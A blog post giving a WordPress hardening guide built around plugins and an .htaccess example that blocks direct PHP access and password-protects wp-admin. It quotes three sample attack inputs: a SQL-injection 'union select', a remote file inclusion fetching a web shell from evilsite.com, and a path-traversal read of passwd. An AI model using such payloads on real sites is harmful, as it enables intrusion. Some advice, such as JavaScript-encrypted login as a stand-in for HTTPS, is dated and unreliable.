WordPress Security Guide

Intro

If you don’t know what WordPress is, you should ask my grandma.

Problem

If you have a blog, you want it to have visitors and to be public, but that brings another problem: security.
Now, FYI, there is always a way to get into your website; this is as true as the fact that we are humans and make mistakes.
So I repeat: as long as applications are written by humans there will always be a bug, and always a better way to do the same thing.

WordPress Security Guide

The good news is that you can harden your WordPress installation just by using plugins; one-click install, easy, don’t you think?
There is one main plugin that will close almost all the security holes on your WordPress, and its name is AskApache Password Protect.
It uses a simple technology (.htaccess) but the results are really amazing.
These guys are really smart.
Currently there are many PHP vulnerabilities, namely SQL injection, XSS, LFI, RFI, CSRF, etc., but all these vulnerabilities have one thing in common.
They are PHP vulnerabilities :)
So why don’t we just block direct access to our PHP files?
This plugin has my favorite option :) it blocks direct access to PHP files under the /wp-includes/ and /wp-content/ directories.
Let’s give it a try:

http://albanianwizard.org/wp-includes/bookmark.php

The response is 403, permission denied by the server, so you don’t need to worry about any
bookmark.php?’union+select+all+from……–
or any bookmark.php?site=http://evilsite.com/r57.txt?
or any bookmark.php?file=../../../passwd
(note that these are just random examples),
and this is because direct access to the file is denied.
Another cool plugin for removing WordPress information is WP-Secure (it removes WordPress info, adds empty files to directories, and much more).
Then you should add an .htaccess to your wp-admin directory to protect this vital WordPress directory.
You can do this with AskApache Password Protect as well.
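As an added example (not code from the original post and not the AskApache plugin’s own output), here is the shape of the .htaccess rules that implement the two steps above: refusing direct requests for PHP files under wp-includes and wp-content, and putting a second, web-server-level password in front of wp-admin. It assumes Apache 2.4 syntax with mod_rewrite, mod_auth_basic and mod_authn_file enabled, WordPress installed at the web root, and a password file created with htpasswd at the placeholder path shown.

```apacheconf
# Added example; not from the original post or the AskApache plugin.
# Assumes Apache 2.4, mod_rewrite, mod_auth_basic, mod_authn_file, and
# WordPress at the web root.

# ---- /.htaccess (site root) ------------------------------------------------
# Place this block ABOVE the "# BEGIN WordPress" rewrite block so it is
# evaluated first. PHP files under wp-includes and wp-content are meant to be
# included by WordPress, not requested by a browser, so a direct request gets
# a 403 (the [F] flag), exactly what the bookmark.php test above shows.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# Files WordPress does request directly; keep these exceptions above the deny
# rules or the editor and front-end AJAX break.
RewriteRule ^wp-includes/js/tinymce/wp-tinymce\.php$ - [L]
RewriteRule ^wp-admin/admin-ajax\.php$ - [L]
# Everything else ending in .php under these two trees is refused.
RewriteRule ^wp-includes/.*\.php$ - [F,L]
RewriteRule ^wp-content/.*\.php$ - [F,L]
</IfModule>

# ---- /wp-admin/.htaccess ---------------------------------------------------
# HTTP Basic authentication in front of the dashboard, independent of the
# WordPress login. admin-ajax.php is exempted so features that call it for
# logged-out visitors keep working (Apache 2.4 replaces the enclosing Require
# with the one in the more specific <Files> section).
<Files admin-ajax.php>
    Require all granted
</Files>
AuthType Basic
AuthName "Restricted area"
# Placeholder path: create the file outside the web root, e.g.
#   htpasswd -c /path/outside/webroot/.htpasswd admin
AuthUserFile /path/outside/webroot/.htpasswd
Require valid-user
```

Check it the same way the post does: requesting /wp-includes/bookmark.php on your own site should now return 403, while the dashboard prompts for the Basic-auth credentials before the WordPress login form appears. The wp-content rule is the one most likely to need tuning, since a few plugins and themes serve PHP files directly from their own directories; test those after enabling it and add a narrow exception (another `RewriteRule ... - [L]` above the deny lines) rather than dropping the rule.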
What about sniffers?
Your website could be the most hardened site on the web, but if somebody is sniffing your network when you log in, the password is simply sent out in the clear and the nice guy will log in to your blog with your credentials.
Best solution? Semisecure Login: it creates a JavaScript-encrypted session between your browser and your blog, so your password is not sent over the net in the clear but encrypted.
I have checked this myself with Wireshark to believe it, and it’s true.
The password is only ever sent in encrypted form.

Proof:

[Screenshot: semisecurelogin wireshark test]

In a normal login you would see your password sent in the clear over HTTP, but in this case you can see that the password is encrypted. Note that this protects only the password itself; the rest of the HTTP exchange, including the session cookie WordPress sets after a successful login, still travels unencrypted over plain HTTP.

Other security considerations: you have probably already read other guides saying to change your default admin username or change your database prefix. These are good tips, but there are ways of bypassing them, so I won’t bother you with them any further.

To install the plugins, just go to Plugins > Install new plugins, search for them and install them; then in AskApache Password Protect select the options you like.

Conclusion

As I said above, these tips will reduce the “get-in” doors to your site as much as possible, but if somebody has a 0-day FTP exploit for your server there is not much you can do about it.
So selecting a more secure web hosting provider can also improve the security of your website. Also, let’s say you have a good hosting provider but you are not on a dedicated server: the attacker could always do a reverse-IP lookup and get to another website hosted on the same server in order to reach you, so the best solution is a dedicated server. But we are talking about blogs, so if you are not running a business, shared hosting is good for you.
Keep your backups up to date.


One Response to “WordPress Security Guide”

  1. seo November 29, 2010 at 1:43 pm #

    Hi,

    I was looking for this for a long time….

    Thanks much again.
